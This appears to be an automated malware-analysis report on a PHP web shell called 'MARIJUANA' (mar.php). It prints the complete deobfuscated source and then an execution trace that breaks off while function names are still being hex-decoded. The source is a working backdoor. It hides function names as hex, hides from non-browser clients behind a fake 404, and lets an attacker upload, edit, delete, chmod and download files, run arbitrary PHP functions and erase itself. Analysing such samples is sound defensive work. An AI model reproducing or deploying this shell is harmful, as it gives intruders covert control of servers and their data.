PHP Malware Analysis

mar.php

md5: 12839b18208de65d9628050742229f02

Jump to:

Screenshot


Attributes

Encoding

Environment

Input

Title

URLs


Deobfuscated PHP code

<?php 
header("X-XSS-Protection: 0");
ob_start();
set_time_limit(0);
error_reporting(0);
ini_set('display_errors', FALSE);
$Array = ['7068705f756e616d65', '70687076657273696f6e', '6368646972', '676574637764', '707265675f73706c6974', '636f7079', '66696c655f6765745f636f6e74656e7473', '6261736536345f6465636f6465', '69735f646972', '6f625f656e645f636c65616e28293b', '756e6c696e6b', '6d6b646972', '63686d6f64', '7363616e646972', '7374725f7265706c616365', '68746d6c7370656369616c6368617273', '7661725f64756d70', '666f70656e', '667772697465', '66636c6f7365', '64617465', '66696c656d74696d65', '737562737472', '737072696e7466', '66696c657065726d73', '746f756368', '66696c655f657869737473', '72656e616d65', '69735f6172726179', '69735f6f626a656374', '737472706f73', '69735f7772697461626c65', '69735f7265616461626c65', '737472746f74696d65', '66696c6573697a65', '726d646972', '6f625f6765745f636c65616e', '7265616466696c65', '617373657274'];
$___ = count($Array);
for ($i = 0; $i < $___; $i++) {
    $GNJ[] = uhex($Array[$i]);
}
if (!empty($_SERVER['HTTP_USER_AGENT'])) {
    if (!preg_match("/Chrome|Firefox|Opera|Safari|Browser|Windows|Linux|Macintosh|Mac OS|Android|iP(ad|hone|od)/i", $_SERVER['HTTP_USER_AGENT'])) {
        header("HTTP/1.0 404 Not Found");
        exit;
    }
}
?>
<!DOCTYPE html>
	<html dir="auto" lang="en-US">

		<head>
			<meta charset="UTF-8">
			<meta name="robots" content="NOINDEX, NOFOLLOW">
				<title>MARIJUANA</title>	
<style>
@charset "UTF-8";@import url(https://use.fontawesome.com/releases/v5.8.1/css/all.css);@font-face{font-family:Consolas}html{margin-left:1em;margin-right:1em;margin-top:-1.5em;background:#189048!important;font-family:Courier;}.x{text-align:center}.y{font-family:i;font-size:calc(2.3em + 2.3vw);color:#181818}.y:hover{color:#fff}.w{color:#fff}.b{color:#000}.q{margin-top:.5em}article{margin-top:1.5em;font-size:.9em}.i{float:left}.u{float:right;text-align:right;margin-bottom:1.5em}input[type=file]{display:none}input[type=submit]{border:1px solid #181818;padding:.2em;background:0 0}td{color:#000}th{font-weight:400;border-bottom:thin solid #181818;color:#fff}.et{text-align:left;color:#000}.r:hover{background:#079992}.l{border:1px solid #181818;padding:1px;background:0 0}footer{margin-top:2em;height:2.2rem;width:100%;font-size:.9em}footer:hover{color:#fff}a{text-decoration:none;color:#000}a:hover{color:#fff}.m{margin-left:2.4em}textarea{background:0 0;border:none;width:70%;height:30em;font-family:Courier;font-size:.9em}textarea.o{background:#fff}.h{color:#ea2027}
</style>
		</head>

		<body>
			<header>
				<div class="y x">
					<a class="ajx" href="<?php 
echo basename($_SERVER['PHP_SELF']);
?>">
						MARIJuANA
					</a>
				</div>

				<div class="q x w">
					&#8212; DIOS &#8212; NO &#8212; CREA &#8212; NADA &#8212; EN &#8212; VANO &#8212;
				</div>
				
			</header>

			<article>
				<div class="i">
					<i class="far fa-hdd"></i>
					<?php 
echo $GNJ[0]();
?>

					<br />

					<i class="far fa-lightbulb"></i> &thinsp;&thinsp;<b>SOFT  :</b> <?php 
echo $_SERVER['SERVER_SOFTWARE'];
?> <b>PHP :</b> <?php 
echo $GNJ[1]();
?>

					<br />

					<i class="far fa-folder"></i>
					
					<?php 
if (isset($_GET["d"])) {
    $d = uhex($_GET["d"]);
    $GNJ[2](uhex($_GET["d"]));
} else {
    $d = $GNJ[3]();
}
$k = $GNJ[4]("/(\\\\|\\/)/", $d);
foreach ($k as $m => $l) {
    if ($l == '' && $m == 0) {
        echo "<a class=\"ajx\" href=\"?d=2f\">/</a>";
    }
    if ($l == '') {
        continue;
    }
    echo "<a class=\"ajx\" href=\"?d=";
    for ($i = 0; $i <= $m; $i++) {
        echo hex($k[$i]);
        if ($i != $m) {
            echo "2f";
        }
    }
    echo '">' . $l . '</a>/';
}
?>

					<br />

				</div>

				<div class="u">
					<?php 
echo $_SERVER['SERVER_ADDR'];
?> <i class="fas fa-link"></i>
					<br />

					<br />

					<form method="post" enctype="multipart/form-data">
						<label class="l w">
							<input type="file" name="n[]" onchange="this.form.submit()" multiple> &nbsp;UPLOAD
						</label>&nbsp;
					</form>

					<?php 
$o_ = ['<script>$.notify("', '", { className:"1",autoHideDelay: 2000,position:"left bottom" });</script>'];
$f = "<script>\$.notify(\"OK!\", { className:\"1\",autoHideDelay: 2000,position:\"left bottom\" });</script>";
$g = "<script>\$.notify(\"ER!\", { className:\"1\",autoHideDelay: 2000,position:\"left bottom\" });</script>";
if (isset($_FILES["n"])) {
    $z = $_FILES["n"]["name"];
    $r = count($z);
    for ($i = 0; $i < $r; $i++) {
        if ($GNJ[5]($_FILES["n"]["tmp_name"][$i], $z[$i])) {
            echo $f;
        } else {
            echo $g;
        }
    }
}
?>

				</div>
					<?php 
$a_ = '<table cellspacing="0" cellpadding="7" width="100%">
						<thead>
							<tr>
								<th>';
$b_ = '</th>
							</tr>
						</thead>
						<tbody>
							<tr>
								<td></td>
							</tr>
							<tr>
								<td class="x">';
$c_ = '</td>
							</tr>
						</tbody>
					</table>';
$d_ = '<br />
										<br />
										<input type="submit" class="w" value="&nbsp;OK&nbsp;" />
									</form>';
if (isset($_GET["s"])) {
    echo $a_ . uhex($_GET["s"]) . $b_ . '
									<textarea readonly="yes">' . $GNJ[15]($GNJ[6](uhex($_GET["s"]))) . '</textarea>
									<br />
									<br />
									<input onclick="location.href=\'?d=' . $_GET["d"] . '&e=' . $_GET["s"] . '\'" type="submit" class="w" value="&nbsp;EDIT&nbsp;" />
								' . $c_;
} elseif (isset($_GET["y"])) {
    echo "<table cellspacing=\"0\" cellpadding=\"7\" width=\"100%\">\r\n\t\t\t\t\t\t<thead>\r\n\t\t\t\t\t\t\t<tr>\r\n\t\t\t\t\t\t\t\t<th>REQUEST</th>\r\n\t\t\t\t\t\t\t</tr>\r\n\t\t\t\t\t\t</thead>\r\n\t\t\t\t\t\t<tbody>\r\n\t\t\t\t\t\t\t<tr>\r\n\t\t\t\t\t\t\t\t<td></td>\r\n\t\t\t\t\t\t\t</tr>\r\n\t\t\t\t\t\t\t<tr>\r\n\t\t\t\t\t\t\t\t<td class=\"x\">\r\n\t\t\t\t\t\t\t\t\t<form method=\"post\">\r\n\t\t\t\t\t\t\t\t\t\t<input class=\"x\" type=\"text\" name=\"1\" />&nbsp;&nbsp;\r\n\t\t\t\t\t\t\t\t\t\t<input class=\"x\" type=\"text\" name=\"2\" />\r\n\t\t\t\t\t\t\t\t\t\t<br />\r\n\t\t\t\t\t\t\t\t\t\t<br />\r\n\t\t\t\t\t\t\t\t\t\t<input type=\"submit\" class=\"w\" value=\"&nbsp;OK&nbsp;\" />\r\n\t\t\t\t\t\t\t\t\t</form>\r\n\t\t\t\t\t\t\t\t\t<br />\r\n\t\t\t\t\t\t\t\t\t<textarea readonly=\"yes\">";
    if (isset($_POST["2"])) {
        echo $GNJ[15](dre($_POST["1"], $_POST["2"]));
    }
    echo '</textarea>
								' . $c_;
} elseif (isset($_GET["e"])) {
    echo $a_ . uhex($_GET["e"]) . $b_ . '
									<form method="post">
										<textarea name="e" class="o">' . $GNJ[15]($GNJ[6](uhex($_GET["e"]))) . '</textarea>
										<br />
										<br />
										<span class="w">BASE64</span> :
										<select id="b64" name="b64">
											<option value="0">NO</option>
											<option value="1">YES</option>
										</select>
										' . $d_ . '
								' . $c_ . '
								
					<script>
						$("#b64").change(function() {
							if($("#b64 option:selected").val() == 0) {
								var X = $("textarea").val();
								var Z = atob(X);
								$("textarea").val(Z);
							}
							else {
								var N = $("textarea").val();
								var I = btoa(N);
								$("textarea").val(I);
							}
						});
					</script>';
    if (isset($_POST["e"])) {
        if ($_POST["b64"] == "1") {
            $ex = $GNJ[7]($_POST["e"]);
        } else {
            $ex = $_POST["e"];
        }
        $fp = $GNJ[17](uhex($_GET["e"]), 'w');
        if ($GNJ[18]($fp, $ex)) {
            OK();
        } else {
            ER();
        }
        $GNJ[19]($fp);
    }
} elseif (isset($_GET["x"])) {
    rec(uhex($_GET["x"]));
    if ($GNJ[26](uhex($_GET["x"]))) {
        ER();
    } else {
        OK();
    }
} elseif (isset($_GET["t"])) {
    echo $a_ . uhex($_GET["t"]) . $b_ . '
									<form action="" method="post">
										<input name="t" class="x" type="text" value="' . $GNJ[20]("Y-m-d H:i", $GNJ[21](uhex($_GET["t"]))) . '">
										' . $d_ . '
								' . $c_;
    if (!empty($_POST["t"])) {
        $p = $GNJ[33]($_POST["t"]);
        if ($p) {
            if (!$GNJ[25](uhex($_GET["t"]), $p, $p)) {
                ER();
            } else {
                OK();
            }
        } else {
            ER();
        }
    }
} elseif (isset($_GET["k"])) {
    echo $a_ . uhex($_GET["k"]) . $b_ . '
									<form action="" method="post">
										<input name="b" class="x" type="text" value="' . $GNJ[22]($GNJ[23]('%o', $GNJ[24](uhex($_GET["k"]))), -4) . '">
										' . $d_ . '
								' . $c_;
    if (!empty($_POST["b"])) {
        $x = $_POST["b"];
        $t = 0;
        for ($i = strlen($x) - 1; $i >= 0; --$i) {
            $t += (int) $x[$i] * pow(8, strlen($x) - $i - 1);
        }
        if (!$GNJ[12](uhex($_GET["k"]), $t)) {
            ER();
        } else {
            OK();
        }
    }
} elseif (isset($_GET["l"])) {
    echo $a_ . '+DIR' . $b_ . '
									<form action="" method="post">
										<input name="l" class="x" type="text" value="">
										' . $d_ . '
								' . $c_;
    if (isset($_POST["l"])) {
        if (!$GNJ[11]($_POST["l"])) {
            ER();
        } else {
            OK();
        }
    }
} elseif (isset($_GET["q"])) {
    if ($GNJ[10]("/var/www/html/mar.php.ad25c5af893f027a38e495feac4e0cc5.bin")) {
        $GNJ[38]($GNJ[9]);
        header("Location: " . basename($_SERVER['PHP_SELF']) . "");
        exit;
    } else {
        echo $g;
    }
} elseif (isset($_GET["n"])) {
    echo $a_ . '+FILE' . $b_ . '
									<form action="" method="post">
										<input name="n" class="x" type="text" value="">
										' . $d_ . '
								' . $c_;
    if (isset($_POST["n"])) {
        if (!$GNJ[25]($_POST["n"])) {
            ER();
        } else {
            OK();
        }
    }
} elseif (isset($_GET["r"])) {
    echo $a_ . uhex($_GET["r"]) . $b_ . '
									<form action="" method="post">
										<input name="r" class="x" type="text" value="' . uhex($_GET["r"]) . '">
										' . $d_ . '
								' . $c_;
    if (isset($_POST["r"])) {
        if ($GNJ[26]($_POST["r"])) {
            ER();
        } else {
            if ($GNJ[27](uhex($_GET["r"]), $_POST["r"])) {
                OK();
            } else {
                ER();
            }
        }
    }
} elseif (isset($_GET["z"])) {
    $zip = new ZipArchive();
    $res = $zip->open(uhex($_GET["z"]));
    if ($res === TRUE) {
        $zip->extractTo(uhex($_GET["d"]));
        $zip->close();
        OK();
    } else {
        ER();
    }
} else {
    echo '<table cellspacing="0" cellpadding="7" width="100%">
						<thead>
							<tr>
								<th width="44%">[ NAME ]</th>
								<th width="11%">[ SIZE ]</th>
								<th width="17%">[ PERM ]</th>
								<th width="17%">[ DATE ]</th>
								<th width="11%">[ ACT ]</th>
							</tr>
						</thead>
						<tbody>
							<tr>
								<td>
									<a class="ajx" href="?d=' . hex($d) . '&n">+FILE</a>
									<a class="ajx" href="?d=' . hex($d) . '&l">+DIR</a>
								</td>
							</tr>
						';
    $h = "";
    $j = "";
    $w = $GNJ[13]($d);
    if ($GNJ[28]($w) || $GNJ[29]($w)) {
        foreach ($w as $c) {
            $e = $GNJ[14]("\\", "/", $d);
            if (!$GNJ[30]($c, ".zip")) {
                $zi = '';
            } else {
                $zi = '<a href="?d=' . hex($e) . '&z=' . hex($c) . '">U</a>';
            }
            if ($GNJ[31]("{$d}/{$c}")) {
                $o = "";
            } elseif (!$GNJ[32]("{$d}/{$c}")) {
                $o = " h";
            } else {
                $o = " w";
            }
            $s = $GNJ[34]("{$d}/{$c}") / 1024;
            $s = round($s, 3);
            if ($s >= 1024) {
                $s = round($s / 1024, 2) . " MB";
            } else {
                $s .= " KB";
            }
            if ($c != "." && $c != "..") {
                $GNJ[8]("{$d}/{$c}") ? $h .= '<tr class="r">
							<td>
								<i class="far fa-folder m"></i>
								<a class="ajx" href="?d=' . hex($e) . hex("/" . $c) . '">' . $c . '</a>
							</td>
							<td class="x">
								dir
							</td>
							<td class="x">
								<a class="ajx' . $o . '" href="?d=' . hex($e) . '&k=' . hex($c) . '">' . x("{$d}/{$c}") . '</a>
							</td>
							<td class="x">
								<a class="ajx" href="?d=' . hex($e) . '&t=' . hex($c) . '">' . $GNJ[20]("Y-m-d H:i", $GNJ[21]("{$d}/{$c}")) . '</a>
							</td>
							<td class="x">
								<a class="ajx" href="?d=' . hex($e) . '&r=' . hex($c) . '">R</a>
								<a href="?d=' . hex($e) . '&x=' . hex($c) . '">D</a>
							</td>
						</tr>
						
						' : ($j .= '<tr class="r">
							<td>
								<i class="far fa-file m"></i>&thinsp;
								<a class="ajx" href="?d=' . hex($e) . '&s=' . hex($c) . '">' . $c . '</a>
							</td>
							<td class="x">
								' . $s . '
							</td>
							<td class="x">
								<a class="ajx' . $o . '" href="?d=' . hex($e) . '&k=' . hex($c) . '">' . x("{$d}/{$c}") . '</a>
							</td>
							<td class="x">
								<a class="ajx" href="?d=' . hex($e) . '&t=' . hex($c) . '">' . $GNJ[20]("Y-m-d H:i", $GNJ[21]("{$d}/{$c}")) . '</a>
							</td>
							<td class="x">
								<a class="ajx" href="?d=' . hex($e) . '&r=' . hex($c) . '">R</a>
								<a class="ajx" href="?d=' . hex($e) . '&e=' . hex($c) . '">E</a>
								<a href="?d=' . hex($e) . '&g=' . hex($c) . '">G</a>
								' . $zi . '
								<a href="?d=' . hex($e) . '&x=' . hex($c) . '">D</a>
							</td>
						</tr>
						
						');
            }
        }
    }
    echo $h;
    echo $j;
    echo '</tbody>
						<tfoot>
							<tr>
								<th class="et">
									<a class="ajx" href="?d=' . hex($e) . '&y">REQUEST</a>
									<a href="?d=' . hex($e) . '&q">EXIT</a>
								</th>
								<th class="et" width="11%"></th>
								<th class="et" width="17%"></th>
								<th class="et" width="17%"></th>
								<th class="et" width="11%"></th>
							</tr>
					</tfoot>
				</table>';
}
?>

			</article>
			<footer class="x">
				&copy;TheAlmightyZeus
			</footer>
			<?php 
if (isset($_GET["1"])) {
    echo $f;
} elseif (isset($_GET["0"])) {
    echo $g;
} else {
    NULL;
}
?>
<script src="//ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
			<script src="//cdnjs.cloudflare.com/ajax/libs/notify/0.4.2/notify.min.js"></script>
			<script>
				$(".ajx").click(function(t){t.preventDefault();var e=$(this).attr("href");history.pushState("","",e),$.get(e,function(t){$("body").html(t)})});
			</script>
		</body>
	</html>
<?php 
function rec($j)
{
    global $GNJ;
    if (trim(pathinfo($j, PATHINFO_BASENAME), '.') === '') {
        return;
    }
    if ($GNJ[8]($j)) {
        array_map('rec', glob($j . DIRECTORY_SEPARATOR . '{,.}*', "GLOB_N_SOWT"));
        $GNJ[35]($j);
    } else {
        $GNJ[10]($j);
    }
}
function dre($y1, $y2)
{
    global $GNJ;
    ob_start();
    $GNJ[16]($y1($y2));
    return $GNJ[36]();
}
function hex($n)
{
    $y = '';
    for ($i = 0; $i < strlen($n); $i++) {
        $y .= dechex(ord($n[$i]));
    }
    return $y;
}
function uhex($y)
{
    $n = '';
    for ($i = 0; $i < strlen($y) - 1; $i += 2) {
        $n .= chr(hexdec($y[$i] . $y[$i + 1]));
    }
    return $n;
}
function OK()
{
    global $GNJ, $d;
    $GNJ[38]($GNJ[9]);
    header("Location: ?d=" . hex($d) . "&1");
    exit;
}
function ER()
{
    global $GNJ, $d;
    $GNJ[38]($GNJ[9]);
    header("Location: ?d=" . hex($d) . "&0");
    exit;
}
function x($c)
{
    global $GNJ;
    $x = $GNJ[24]($c);
    if (($x & 0xc000) == 0xc000) {
        $u = "s";
    } elseif (($x & 0xa000) == 0xa000) {
        $u = "l";
    } elseif (($x & 0x8000) == 0x8000) {
        $u = "-";
    } elseif (($x & 0x6000) == 0x6000) {
        $u = "b";
    } elseif (($x & 0x4000) == 0x4000) {
        $u = "d";
    } elseif (($x & 0x2000) == 0x2000) {
        $u = "c";
    } elseif (($x & 0x1000) == 0x1000) {
        $u = "p";
    } else {
        $u = "u";
    }
    $u .= $x & 0x100 ? "r" : "-";
    $u .= $x & 0x80 ? "w" : "-";
    $u .= $x & 0x40 ? $x & 0x800 ? "s" : "x" : ($x & 0x800 ? "S" : "-");
    $u .= $x & 0x20 ? "r" : "-";
    $u .= $x & 0x10 ? "w" : "-";
    $u .= $x & 0x8 ? $x & 0x400 ? "s" : "x" : ($x & 0x400 ? "S" : "-");
    $u .= $x & 0x4 ? "r" : "-";
    $u .= $x & 0x2 ? "w" : "-";
    $u .= $x & 0x1 ? $x & 0x200 ? "t" : "x" : ($x & 0x200 ? "T" : "-");
    return $u;
}
if (isset($_GET["g"])) {
    $GNJ[38]($GNJ[9]);
    header("Content-Type: application/octet-stream");
    header("Content-Transfer-Encoding: Binary");
    header("Content-Length: " . $GNJ[34](uhex($_GET["g"])));
    header("Content-disposition: attachment; filename=\"" . uhex($_GET["g"]) . "\"");
    $GNJ[37](uhex($_GET["g"]));
}

Execution traces

data/traces/12839b18208de65d9628050742229f02_trace-1676255868.7915.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 00:38:14.689381]
1	0	1	0.000180	393512
1	3	0	0.000888	503216	{main}	1		/var/www/html/uploads/mar.php	0	0
2	4	0	0.000913	503216	header	0		/var/www/html/uploads/mar.php	1	1	'X-XSS-Protection: 0'
2	4	1	0.000936	503312
2	4	R			NULL
2	5	0	0.000955	503280	ob_start	0		/var/www/html/uploads/mar.php	1	0
2	5	1	0.000972	519792
2	5	R			TRUE
2	6	0	0.000990	519792	set_time_limit	0		/var/www/html/uploads/mar.php	1	1	0
2	6	1	0.001010	519856
2	6	R			FALSE
2	7	0	0.001027	519824	error_reporting	0		/var/www/html/uploads/mar.php	1	1	0
2	7	1	0.001044	519864
2	7	R			22527
2	8	0	0.001062	519824	ini_set	0		/var/www/html/uploads/mar.php	1	2	'display_errors'	FALSE
2	8	1	0.001082	519896
2	8	R			''
1		A						/var/www/html/uploads/mar.php	3	$Array = [0 => '7068705f756e616d65', 1 => '70687076657273696f6e', 2 => '6368646972', 3 => '676574637764', 4 => '707265675f73706c6974', 5 => '636f7079', 6 => '66696c655f6765745f636f6e74656e7473', 7 => '6261736536345f6465636f6465', 8 => '69735f646972', 9 => '6f625f656e645f636c65616e28293b', 10 => '756e6c696e6b', 11 => '6d6b646972', 12 => '63686d6f64', 13 => '7363616e646972', 14 => '7374725f7265706c616365', 15 => '68746d6c7370656369616c6368617273', 16 => '7661725f64756d70', 17 => '666f70656e', 18 => '667772697465', 19 => '66636c6f7365', 20 => '64617465', 21 => '66696c656d74696d65', 22 => '737562737472', 23 => '737072696e7466', 24 => '66696c657065726d73', 25 => '746f756368', 26 => '66696c655f657869737473', 27 => '72656e616d65', 28 => '69735f6172726179', 29 => '69735f6f626a656374', 30 => '737472706f73', 31 => '69735f7772697461626c65', 32 => '69735f7265616461626c65', 33 => '737472746f74696d65', 34 => '66696c6573697a65', 35 => '726d646972', 36 => '6f625f6765745f636c65616e', 37 => '7265616466696c65', 38 => '617373657274']
1		A						/var/www/html/uploads/mar.php	43	$___ = 39
1		A						/var/www/html/uploads/mar.php	44	$i = 0
2	9	0	0.001194	519824	uhex	1		/var/www/html/uploads/mar.php	44	1	'7068705f756e616d65'
2		A						/var/www/html/uploads/mar.php	538	$n = ''
2		A						/var/www/html/uploads/mar.php	539	$i = 0
3	10	0	0.001239	519856	hexdec	0		/var/www/html/uploads/mar.php	540	1	'70'
3	10	1	0.001257	519904
3	10	R			112
3	11	0	0.001275	519824	chr	0		/var/www/html/uploads/mar.php	540	1	112
3	11	1	0.001292	519864
3	11	R			'p'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'p'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	12	0	0.001336	519888	hexdec	0		/var/www/html/uploads/mar.php	540	1	'68'
3	12	1	0.001352	519936
3	12	R			104
3	13	0	0.001369	519856	chr	0		/var/www/html/uploads/mar.php	540	1	104
3	13	1	0.001385	519896
3	13	R			'h'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'h'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	14	0	0.001426	519888	hexdec	0		/var/www/html/uploads/mar.php	540	1	'70'
3	14	1	0.001442	519936
3	14	R			112
3	15	0	0.001458	519856	chr	0		/var/www/html/uploads/mar.php	540	1	112
3	15	1	0.001473	519896
3	15	R			'p'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'p'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	16	0	0.001514	519888	hexdec	0		/var/www/html/uploads/mar.php	540	1	'5f'
3	16	1	0.001530	519936
3	16	R			95
3	17	0	0.001547	519856	chr	0		/var/www/html/uploads/mar.php	540	1	95
3	17	1	0.001562	519896
3	17	R			'_'
2		A						/var/www/html/uploads/mar.php	540	$n .= '_'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	18	0	0.001603	519888	hexdec	0		/var/www/html/uploads/mar.php	540	1	'75'
3	18	1	0.001619	519936
3	18	R			117
3	19	0	0.001635	519856	chr	0		/var/www/html/uploads/mar.php	540	1	117
3	19	1	0.001650	519896
3	19	R			'u'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'u'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	20	0	0.001690	519888	hexdec	0		/var/www/html/uploads/mar.php	540	1	'6e'
3	20	1	0.001706	519936
3	20	R			110
3	21	0	0.001722	519856	chr	0		/var/www/html/uploads/mar.php	540	1	110
3	21	1	0.001746	519896
3	21	R			'n'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'n'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	22	0	0.001789	519888	hexdec	0		/var/www/html/uploads/mar.php	540	1	'61'
3	22	1	0.001805	519936
3	22	R			97
3	23	0	0.001821	519856	chr	0		/var/www/html/uploads/mar.php	540	1	97
3	23	1	0.001836	519896
3	23	R			'a'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'a'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	24	0	0.001876	519888	hexdec	0		/var/www/html/uploads/mar.php	540	1	'6d'
3	24	1	0.001899	519936
3	24	R			109
3	25	0	0.001916	519856	chr	0		/var/www/html/uploads/mar.php	540	1	109
3	25	1	0.001931	519896
3	25	R			'm'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'm'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	26	0	0.001972	519896	hexdec	0		/var/www/html/uploads/mar.php	540	1	'65'
3	26	1	0.001987	519944
3	26	R			101
3	27	0	0.002004	519864	chr	0		/var/www/html/uploads/mar.php	540	1	101
3	27	1	0.002020	519904
3	27	R			'e'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'e'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
2	9	1	0.002060	519864
2	9	R			'php_uname'
1		A						/var/www/html/uploads/mar.php	44	$GNJ[] = 'php_uname'
1		A						/var/www/html/uploads/mar.php	44	$i++
2	28	0	0.002107	520240	uhex	1		/var/www/html/uploads/mar.php	44	1	'70687076657273696f6e'
2		A						/var/www/html/uploads/mar.php	538	$n = ''
2		A						/var/www/html/uploads/mar.php	539	$i = 0
3	29	0	0.002148	520272	hexdec	0		/var/www/html/uploads/mar.php	540	1	'70'
3	29	1	0.002164	520320
3	29	R			112
3	30	0	0.002181	520240	chr	0		/var/www/html/uploads/mar.php	540	1	112
3	30	1	0.002196	520280
3	30	R			'p'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'p'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	31	0	0.002237	520304	hexdec	0		/var/www/html/uploads/mar.php	540	1	'68'
3	31	1	0.002253	520352
3	31	R			104
3	32	0	0.002270	520272	chr	0		/var/www/html/uploads/mar.php	540	1	104
3	32	1	0.002284	520312
3	32	R			'h'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'h'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	33	0	0.002324	520304	hexdec	0		/var/www/html/uploads/mar.php	540	1	'70'
3	33	1	0.002340	520352
3	33	R			112
3	34	0	0.002356	520272	chr	0		/var/www/html/uploads/mar.php	540	1	112
3	34	1	0.002371	520312
3	34	R			'p'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'p'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	35	0	0.002411	520304	hexdec	0		/var/www/html/uploads/mar.php	540	1	'76'
3	35	1	0.002426	520352
3	35	R			118
3	36	0	0.002442	520272	chr	0		/var/www/html/uploads/mar.php	540	1	118
3	36	1	0.002457	520312
3	36	R			'v'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'v'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	37	0	0.002566	520304	hexdec	0		/var/www/html/uploads/mar.php	540	1	'65'
3	37	1	0.002584	520352
3	37	R			101
3	38	0	0.002601	520272	chr	0		/var/www/html/uploads/mar.php	540	1	101
3	38	1	0.002616	520312
3	38	R			'e'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'e'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	39	0	0.002657	520304	hexdec	0		/var/www/html/uploads/mar.php	540	1	'72'
3	39	1	0.002672	520352
3	39	R			114
3	40	0	0.002688	520272	chr	0		/var/www/html/uploads/mar.php	540	1	114
3	40	1	0.002703	520312
3	40	R			'r'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'r'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	41	0	0.002744	520304	hexdec	0		/var/www/html/uploads/mar.php	540	1	'73'
3	41	1	0.002759	520352
3	41	R			115
3	42	0	0.002776	520272	chr	0		/var/www/html/uploads/mar.php	540	1	115
3	42	1	0.002791	520312
3	42	R			's'
2		A						/var/www/html/uploads/mar.php	540	$n .= 's'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	43	0	0.002831	520304	hexdec	0		/var/www/html/uploads/mar.php	540	1	'69'
3	43	1	0.002848	520352
3	43	R			105
3	44	0	0.002863	520272	chr	0		/var/www/html/uploads/mar.php	540	1	105
3	44	1	0.002879	520312
3	44	R			'i'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'i'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	45	0	0.002921	520312	hexdec	0		/var/www/html/uploads/mar.php	540	1	'6f'
3	45	1	0.002934	520360
3	45	R			111
3	46	0	0.002947	520280	chr	0		/var/www/html/uploads/mar.php	540	1	111
3	46	1	0.002964	520320
3	46	R			'o'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'o'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	47	0	0.002995	520312	hexdec	0		/var/www/html/uploads/mar.php	540	1	'6e'
3	47	1	0.003007	520360
3	47	R			110
3	48	0	0.003019	520280	chr	0		/var/www/html/uploads/mar.php	540	1	110
3	48	1	0.003031	520320
3	48	R			'n'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'n'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
2	28	1	0.003060	520280
2	28	R			'phpversion'
1		A						/var/www/html/uploads/mar.php	44	$GNJ[] = 'phpversion'
1		A						/var/www/html/uploads/mar.php	44	$i++
2	49	0	0.003095	520280	uhex	1		/var/www/html/uploads/mar.php	44	1	'6368646972'
2		A						/var/www/html/uploads/mar.php	538	$n = ''
2		A						/var/www/html/uploads/mar.php	539	$i = 0
3	50	0	0.003126	520312	hexdec	0		/var/www/html/uploads/mar.php	540	1	'63'
3	50	1	0.003138	520360
3	50	R			99
3	51	0	0.003150	520280	chr	0		/var/www/html/uploads/mar.php	540	1	99
3	51	1	0.003161	520320
3	51	R			'c'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'c'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	52	0	0.003192	520344	hexdec	0		/var/www/html/uploads/mar.php	540	1	'68'
3	52	1	0.003204	520392
3	52	R			104
3	53	0	0.003217	520312	chr	0		/var/www/html/uploads/mar.php	540	1	104
3	53	1	0.003228	520352
3	53	R			'h'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'h'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	54	0	0.003258	520344	hexdec	0		/var/www/html/uploads/mar.php	540	1	'64'
3	54	1	0.003270	520392
3	54	R			100
3	55	0	0.003285	520312	chr	0		/var/www/html/uploads/mar.php	540	1	100
3	55	1	0.003300	520352
3	55	R			'd'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'd'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	56	0	0.003339	520344	hexdec	0		/var/www/html/uploads/mar.php	540	1	'69'
3	56	1	0.003355	520392
3	56	R			105
3	57	0	0.003371	520312	chr	0		/var/www/html/uploads/mar.php	540	1	105
3	57	1	0.003385	520352
3	57	R			'i'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'i'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	58	0	0.003423	520344	hexdec	0		/var/www/html/uploads/mar.php	540	1	'72'
3	58	1	0.003439	520392
3	58	R			114
3	59	0	0.003455	520312	chr	0		/var/www/html/uploads/mar.php	540	1	114
3	59	1	0.003470	520352
3	59	R			'r'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'r'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
2	49	1	0.003511	520312
2	49	R			'chdir'
1		A						/var/www/html/uploads/mar.php	44	$GNJ[] = 'chdir'
1		A						/var/www/html/uploads/mar.php	44	$i++
